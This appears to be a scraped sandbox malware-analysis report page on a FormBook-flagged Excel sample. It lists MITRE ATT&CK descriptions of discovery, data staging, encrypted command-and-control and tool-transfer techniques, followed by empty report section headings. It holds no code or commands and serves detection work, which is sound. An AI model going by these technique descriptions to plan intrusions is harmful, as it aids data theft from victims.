Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report oustanding 03082921.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations